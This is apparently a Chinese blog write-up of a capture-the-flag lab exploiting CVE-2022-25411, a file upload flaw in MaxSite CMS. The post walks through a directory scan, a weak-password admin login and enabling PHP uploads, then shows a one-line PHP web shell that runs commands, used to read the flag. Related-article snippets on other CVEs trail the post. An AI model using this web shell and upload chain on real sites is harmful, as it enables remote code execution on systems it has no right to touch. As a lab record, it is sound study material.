CVE-2022-25411

最新推荐文章于 2024-07-18 20:16:55 发布
最新推荐文章于 2024-07-18 20:16:55 发布
阅读量409 收藏
点赞数
分类专栏: 春秋云境 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longlangci/article/details/131350815
版权

文章目录

CVE-2022-25411

一、漏洞介绍

Maxsite CMS文件上传漏洞。

MaxSite CMS是俄国MaxSite CMS开源项目的一款网站内容管理系统。马克斯程序(MaxCMS)以开源、免费、功能强大、安全健壮、性能卓越、超级易用、模板众多、插件齐全等优势,受到众多企业和站长的喜爱。马克斯程序研发团队拥有多年的技术积累和产品开发经验,成立了官方技术支持团队、官方模板团队、官方插件团队。一切立足于站长利益、孜孜不倦的挖掘站长需求、不断提升产品体验,自主创新多项特色技术、提升网站品质!独立开发的管理员管理系统,可以对管理员进行更能人性化的管理网站。 Maxsite CMS存在文件上传漏洞,攻击者可利用该漏洞通过精心制作的PHP文件执行任意代码。账户为弱口令。

二、渗透步骤
1、打开网站
http://39.106.48.123:32818/

在这里插入图片描述

2、目录扫描
┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u "http://39.106.48.123:32818/"

在这里插入图片描述

3、访问后台
http://39.106.48.123:32818/login

在这里插入图片描述

4、添加文件后缀
http://39.106.48.123:32818/admin/options

在这里插入图片描述
在这里插入图片描述

5、上传shell
<?php 
	system($_GET[cmd]);
?>

http://39.106.48.123:32818/admin/files

在这里插入图片描述
在这里插入图片描述

6、查看flag值
http://39.106.48.123:32818/uploads/ant.php?cmd=cat%20/flag

在这里插入图片描述

liebe1*1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MaxSite CMS 代码问题漏洞(CVE-2022-25411)
千寻的博客
12-09 1967
Maxsite CMS存在文件上传漏洞,攻击者可利用该漏洞通过精心制作的PHP文件执行任意代码。
CVE-2021-26084
weixin_51387754的博客
09-23 2252
在 Confluence Server 和 Data Center 的受影响版本中,存在 OGNL 注入漏洞,允许未经身份验证的攻击者在 Confluence Server 或数据中心实例上执行任意代码。受影响的版本分别为 6.13.23 之前的版本、7.4.11 之前的 6.14.0 版本、7.11.6 之前的 7.5.0 版本和 7.12.5 之前的 7.12.0 版本。 #!/usr/bin/env python3 # -*- encoding: utf-8 -*- """ @File :
春秋云镜 CVE-2022-25411
qq_22002773的博客
07-04 534
春秋云镜 CVE-2022-25578
MaxSite CMS v180 文件上传漏洞(CVE-2022-25411
最新发布
Flag少侠的博客
07-18 1万+
打开靶场进去一看俄语的网页翻译一下没有找到线索CVE 官网找这个漏洞的详细信息直接访问报错加上 index.php 访问即可打开 BurpSuite 准备爆破这里也加上 index.php 防止 404,然后添加 payload 位置,添加字典开始攻击有一组数据不一样发送到重发模块中发送显示 302,同时给出了四个 Cookie 值选取一个值然后尝试直接访问 /admin/file能访问成功访问设置,一定不能忘记加 index.php 否则 404翻译一下,看到有下载。
春秋云镜CVE-2022-25411
风依旧的博客
05-16 390
春秋云镜CVE-2022-25411,通过搜索引擎得到上传文件路径/admin/files,将cookie修改为正确口令得到的cookie,发现能成功进入上传页面。如果出现404,就是数据包中缺失index.php路径,自行添加即可。思路是对的,但是admin/admin888依然返回302,将口令带入重放器中尝试。通过搜索引擎,得到/admin/options为登录页面,尝试进入登录页面。尝试上传图片,上传成功。
春秋云境:CVE-2022-25411
一只爱吃橙子的羊
12-01 1697
MaxSite CMS是俄国MaxSite CMS开源项目的一款网站内容管理系统。马克斯程序(MaxCMS)以开源、免费、功能强大、安全健壮、性能卓越、超级易用、模板众多、插件齐全等优势,受到众多企业和站长的喜爱。马克斯程序研发团队拥有多年的技术积累和产品开发经验,成立了官方技术支持团队、官方模板团队、官方插件团队。一切立足于站长利益、孜孜不倦的挖掘站长需求、不断提升产品体验,自主创新多项特色技术、提升网站品质!独立开发的管理员管理系统,可以对管理员进行更能人性化的管理网站。 Maxsite CMS存在文件
CVE-2021-3019
weixin_48300170的博客
07-19 465
CVE-2021-3019 Linux Lanproxy 任意文件读取漏洞复现漏洞简介漏洞信息环境搭建漏洞复现修复建议 漏洞简介       lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面…),该漏洞允许目录遍历读取/…/conf/config.properties来获取到内部网连接的凭据。 影响版本   
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
漏洞靶站webug4.0
08-26
WeBug名称定义为“我们的漏洞”靶场环境 基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。 部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
春秋云境:CVE-2022-25411(Maxsite CMS文件上传漏洞)
m0_65712192的博客
04-22 1248
Maxsite CMS存在文件上传漏洞,攻击者可利用该漏洞通过精心制作的PHP文件执行任意代码。账户为弱口令。
CVE-2022-25411,MaxSite CMS是俄国MaxSite CMS开源项目的一款网站内容管理系统。
qq_42036164的博客
01-09 239
MaxSite CMS是俄国MaxSite CMS开源项目的一款网站内容管理系统。
春秋云镜(二)
wanan的博客
02-19 443
春秋云镜(二)
马克斯cms转php,马克斯CMS2.0beta (maxcms)管理员认证绕过漏洞
weixin_42511517的博客
03-26 507
<?phpprint_r('+---------------------------------------------------------------------------+maxcms2.0 creat new admin exploitby Flyh4tteam:wolvez security teamsite:bbs.wolvez.orgdork:salemax#qq.com+...
2020-11-17
weixin_43914278的博客
11-17 2469
import requests import json # &callback=jQuery35109954929483789403_1605576147763&_=1605576147764 res = requests.get('https://view.inews.qq.com/g2/getOnsInfo?name=disease_foreign') # 这里键值对有两层包裹,所以先进入data层,得到res_json res_json = res.json()['data'] .
cve-2022-41741
06-22
CVE-2022-41741是一个安全漏洞的编号,它通常指的是软件中的一个已知安全问题。这种漏洞可能会影响各种系统和应用程序,包括但不限于Web服务器、数据库软件或其他类型的软件。具体的CVE-2022-41741描述可能涉及到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值